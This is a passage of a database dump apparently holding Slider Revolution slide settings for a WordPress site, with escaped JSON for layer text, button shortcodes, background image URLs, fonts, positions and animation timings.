,\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"11\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"560px\",\"e\":true},\"n\":{\"v\":\"560px\",\"e\":true},\"t\":{\"v\":\"560px\"},\"m\":{\"v\":\"560px\"}},\"height\":{\"d\":{\"v\":\"55px\",\"e\":true},\"n\":{\"v\":\"55px\",\"e\":true},\"t\":{\"v\":\"55px\"},\"m\":{\"v\":\"55px\"}},\"originalWidth\":\"560px\",\"originalHeight\":\"55px\"},\"position\":{\"x\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"434px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"634px\",\"e\":true},\"n\":{\"v\":\"408px\",\"e\":true},\"t\":{\"v\":\"511px\",\"e\":true},\"m\":{\"v\":\"338px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"zIndex\":14,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\"},\"m\":{\"v\":\"#000000\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\"},\"m\":{\"v\":\"#000000\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(12,6,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h5-slider-graphic-1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"02\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"effects\":{\"parallax\":\"9\"}}','{\"1\":{\"text\":\"Head Start!\",\"alias\":\"Quick Start\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"590px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"65px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"2\":{\"text\":\"Luisque quis velit dictum, fringilla ex quis, ase tristique diam. Aliquam erat volutpat\\n.\",\"alias\":\"Quisque quis velit d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"421px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"369px\",\"e\":true},\"m\":{\"v\":\"301px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"421px\"},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"338px\",\"e\":true},\"n\":{\"v\":\"254px\",\"e\":true},\"t\":{\"v\":\"655px\",\"e\":true},\"m\":{\"v\":\"145px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":500},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"345px\",\"e\":true},\"n\":{\"v\":\"181px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"422px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"725px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1200,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(13,6,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h5-slider-graphic-3.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"02\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"effects\":{\"parallax\":\"9\"}}','{\"1\":{\"text\":\"Rise and run!\",\"alias\":\"Quick 